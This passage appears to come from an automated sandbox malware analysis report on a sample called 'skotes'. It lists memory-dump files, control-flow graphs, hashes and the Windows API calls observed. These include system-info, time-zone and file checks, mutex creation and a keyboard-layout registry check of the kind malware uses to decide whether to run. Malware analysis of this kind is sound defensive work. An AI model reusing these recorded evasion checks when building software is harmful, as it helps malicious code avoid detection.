                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: EnumOpenValue
                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$=L-t$=L-t$Keyboard Layout\Preload
                                                                                                                • API String ID: 2571532894-3786710308
                                                                                                                • Opcode ID: c06bc9db3bd43b93679a08ae4cf9f95aeed488a22ad130b322141fec7925e22b
                                                                                                                • Instruction ID: 29dd42edbedaa1e75a4d739149a1fafef4c5f5a52be021335fa7795e1508b50c
                                                                                                                • Opcode Fuzzy Hash: c06bc9db3bd43b93679a08ae4cf9f95aeed488a22ad130b322141fec7925e22b
                                                                                                                • Instruction Fuzzy Hash: 9CB1C071940168ABDF24DB54CC89BDEB779AF05340F5002D9E108E7292DB78AFA88F95

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 795 787d30-787db2 call 7b40f0 799 787db8-787de0 call 797a00 call 785c10 795->799 800 788356-788373 call 79cff1 795->800 807 787de2 799->807 808 787de4-787e06 call 797a00 call 785c10 799->808 807->808 813 787e08 808->813 814 787e0a-787e23 808->814 813->814 817 787e54-787e7f 814->817 818 787e25-787e34 814->818 819 787eb0-787ed1 817->819 820 787e81-787e90 817->820 821 787e4a-787e51 call 79d663 818->821 822 787e36-787e44 818->822 826 787ed3-787ed5 GetNativeSystemInfo 819->826 827 787ed7-787edc 819->827 824 787e92-787ea0 820->824 825 787ea6-787ead call 79d663 820->825 821->817 822->821 828 788374 call 7b6c6a 822->828 824->825 824->828 825->819 832 787edd-787ee6 826->832 827->832 833 788379-78837f call 7b6c6a 828->833 836 787ee8-787eef 832->836 837 787f04-787f07 832->837 841 788351 836->841 842 787ef5-787eff 836->842 838 787f0d-787f16 837->838 839 7882f7-7882fa 837->839 844 787f18-787f24 838->844 845 787f29-787f2c 838->845 839->841 846 7882fc-788305 839->846 841->800 843 78834c 842->843 843->841 844->843 848 787f32-787f39 845->848 849 7882d4-7882d6 845->849 850 78832c-78832f 846->850 851 788307-78830b 846->851 852 788019-7882bd call 797a00 call 785c10 call 797a00 call 785c10 call 785d50 call 797a00 call 785c10 call 785730 call 797a00 call 785c10 call 797a00 call 785c10 call 785d50 call 797a00 call 785c10 call 785730 call 797a00 call 785c10 call 797a00 call 785c10 call 785d50 call 797a00 call 785c10 call 785730 call 797a00 call 785c10 call 797a00 call 785c10 call 785d50 call 797a00 call 785c10 call 785730 848->852 853 787f3f-787f9b call 797a00 call 785c10 call 797a00 call 785c10 call 785d50 848->853 858 7882d8-7882e2 849->858 859 7882e4-7882e7 849->859 856 78833d-788349 850->856 857 788331-78833b 850->857 854 78830d-788312 851->854 855 788320-78832a 851->855 895 7882c3-7882cc 852->895 881 787fa0-787fa7 853->881 854->855 862 788314-78831e 854->862 855->841 856->843 857->841 858->843 859->841 860 7882e9-7882f5 859->860 860->843 862->841 882 787fa9 881->882 883 787fab-787fcb call 7b8bbe 881->883 882->883 889 787fcd-787fdc 883->889 890 788002-788004 883->890 892 787fde-787fec 889->892 893 787ff2-787fff call 79d663 889->893 894 78800a-788014 890->894 890->895 892->833 892->893 893->890 894->895 895->839 899 7882ce 895->899 899->849
                                                                                                                APIs
                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00787ED3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InfoNativeSystem
                                                                                                                • String ID: =L-t$JjsrPl==$JjsrQV==$JjssOl==$JjssPV==$Py
                                                                                                                • API String ID: 1721193555-3410820028
                                                                                                                • Opcode ID: 92155d5937938e938ef78e1e94ee55ac945567b3acbd8d14acf7a964f8781bcf
                                                                                                                • Instruction ID: 0d826ccb3c9144d0a580ecea1bca602a39e26976aff9ddbdd5f20676773a19d4
                                                                                                                • Opcode Fuzzy Hash: 92155d5937938e938ef78e1e94ee55ac945567b3acbd8d14acf7a964f8781bcf
                                                                                                                • Instruction Fuzzy Hash: 43E1F370E40644DBDB18BB68DC4F79D7A71AB46720FA4428CE415AB3C2DB7D4E818BD2

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1202 7c26f2-7c271a call 7c2133 call 7c2191 1207 7c2720-7c272c call 7c2139 1202->1207 1208 7c2842-7c289e call 7b6c87 call 7c62ee 1202->1208 1207->1208 1213 7c2732-7c273e call 7c2165 1207->1213 1220 7c28a8-7c28ab 1208->1220 1221 7c28a0-7c28a6 1208->1221 1213->1208 1219 7c2744-7c2765 call 7badf5 GetTimeZoneInformation 1213->1219 1233 7c276b-7c278c 1219->1233 1234 7c2820-7c2841 call 7c212d call 7c2121 call 7c2127 1219->1234 1222 7c28ad-7c28bd call 7bb04b 1220->1222 1223 7c28ee-7c2900 1220->1223 1221->1223 1238 7c28bf 1222->1238 1239 7c28c7-7c28e0 call 7c62ee 1222->1239 1227 7c2910 1223->1227 1228 7c2902-7c2905 1223->1228 1230 7c2915-7c292a call 7badf5 call 79cff1 1227->1230 1231 7c2910 call 7c26f2 1227->1231 1228->1227 1229 7c2907-7c290e call 7c2517 1228->1229 1229->1230 1231->1230 1240 7c278e-7c2793 1233->1240 1241 7c2796-7c279d 1233->1241 1246 7c28c0-7c28c5 call 7badf5 1238->1246 1255 7c28e5-7c28eb call 7badf5 1239->1255 1256 7c28e2-7c28e3 1239->1256 1240->1241 1247 7c27af-7c27b1 1241->1247 1248 7c279f-7c27a6 1241->1248 1261 7c28ed 1246->1261 1251 7c27b3-7c27dc call 7bef17 call 7be926 1247->1251 1248->1247 1249 7c27a8-7c27ad 1248->1249 1249->1251 1269 7c27de-7c27e1 1251->1269 1270 7c27ea-7c27ec 1251->1270 1255->1261 1256->1246 1261->1223 1269->1270 1271 7c27e3-7c27e8 1269->1271 1272 7c27ee-7c280c call 7be926 1270->1272 1271->1272 1275 7c280e-7c2811 1272->1275 1276 7c281b-7c281e 1272->1276 1275->1276 1277 7c2813-7c2819 1275->1277 1276->1234 1277->1234
                                                                                                                APIs
                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,007D6758), ref: 007C275C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InformationTimeZone
                                                                                                                • String ID: =L-t$Eastern Standard Time$Eastern Summer Time$Xg}
                                                                                                                • API String ID: 565725191-3469898719
                                                                                                                • Opcode ID: 8ad3a0ddf5e75971bc46214041ca4c920472dde3425f3f9a690abd126c65615d
                                                                                                                • Instruction ID: 75a91c4ddeb08ed1d588678893def4db6e993947bbaecf7148947d8e13bd8d9d
                                                                                                                • Opcode Fuzzy Hash: 8ad3a0ddf5e75971bc46214041ca4c920472dde3425f3f9a690abd126c65615d
                                                                                                                • Instruction Fuzzy Hash: C1510971900259EFDB10EF649C85FAE77FCEB54360B14416DE610A7193EB3C9E428B60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1278 7b6fb4-7b6fe9 GetFileType 1279 7b6fef-7b6ffa 1278->1279 1280 7b70a1-7b70a4 1278->1280 1283 7b701c-7b7038 call 7b40f0 GetFileInformationByHandle 1279->1283 1284 7b6ffc-7b700d call 7b732a 1279->1284 1281 7b70cd-7b70f5 1280->1281 1282 7b70a6-7b70a9 1280->1282 1287 7b7112-7b7114 1281->1287 1288 7b70f7-7b710a 1281->1288 1282->1281 1285 7b70ab-7b70ad 1282->1285 1293 7b70be-7b70cb call 7b75c0 1283->1293 1300 7b703e-7b7080 call 7b727c call 7b7124 * 3 1283->1300 1296 7b70ba-7b70bc 1284->1296 1297 7b7013-7b701a 1284->1297 1292 7b70af-7b70b4 call 7b75f6 1285->1292 1285->1293 1291 7b7115-7b7123 call 79cff1 1287->1291 1288->1287 1301 7b710c-7b710f 1288->1301 1292->1296 1293->1296 1296->1291 1297->1283 1314 7b7085-7b709d call 7b7249 1300->1314 1301->1287 1314->1287 1317 7b709f 1314->1317 1317->1296
                                                                                                                APIs
                                                                                                                • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007B6EE6), ref: 007B6FD6
                                                                                                                • GetFileInformationByHandle.KERNELBASE(?,?), ref: 007B7030
                                                                                                                • __dosmaperr.LIBCMT ref: 007B70C5
                                                                                                                  • Part of subcall function 007B732A: __dosmaperr.LIBCMT ref: 007B735F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File__dosmaperr$HandleInformationType
                                                                                                                • String ID: =L-t$n{
                                                                                                                • API String ID: 2531987475-3203586158
                                                                                                                • Opcode ID: 18e4532ea32e81020171576e68ff6d0472846cb24dd4d63cd133a20ecb79d2bf
                                                                                                                • Instruction ID: 02af4e82f0a9843940a8c15cdf97fb5cb56f3326f76a7934dd592c72365eabf8
                                                                                                                • Opcode Fuzzy Hash: 18e4532ea32e81020171576e68ff6d0472846cb24dd4d63cd133a20ecb79d2bf
                                                                                                                • Instruction Fuzzy Hash: 5E415D71904208ABDB28EFB5DC45AEFB7F9EFC8300B10482EF856D3610E6389900DB61

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1530 789ba5-789bc5 GetFileAttributesA 1533 789bf3-789c0f 1530->1533 1534 789bc7-789bd3 1530->1534 1537 789c3d-789c5c 1533->1537 1538 789c11-789c1d 1533->1538 1535 789be9-789bf0 call 79d663 1534->1535 1536 789bd5-789be3 1534->1536 1535->1533 1536->1535 1541 78a91c 1536->1541 1539 789c8a-78a916 call 7980c0 1537->1539 1540 789c5e-789c6a 1537->1540 1543 789c1f-789c2d 1538->1543 1544 789c33-789c3a call 79d663 1538->1544 1545 789c6c-789c7a 1540->1545 1546 789c80-789c87 call 79d663 1540->1546 1548 78a953-78a987 Sleep CreateMutexA 1541->1548 1549 78a91c call 7b6c6a 1541->1549 1543->1541 1543->1544 1544->1537 1545->1541 1545->1546 1546->1539 1559 78a98e-78a994 1548->1559 1549->1548 1560 78a996-78a998 1559->1560 1561 78a9a7-78a9a8 1559->1561 1560->1561 1562 78a99a-78a9a5 1560->1562 1562->1561 1564 78a9a9-78a9b0 call 7b6629 1562->1564
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00789BA8
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
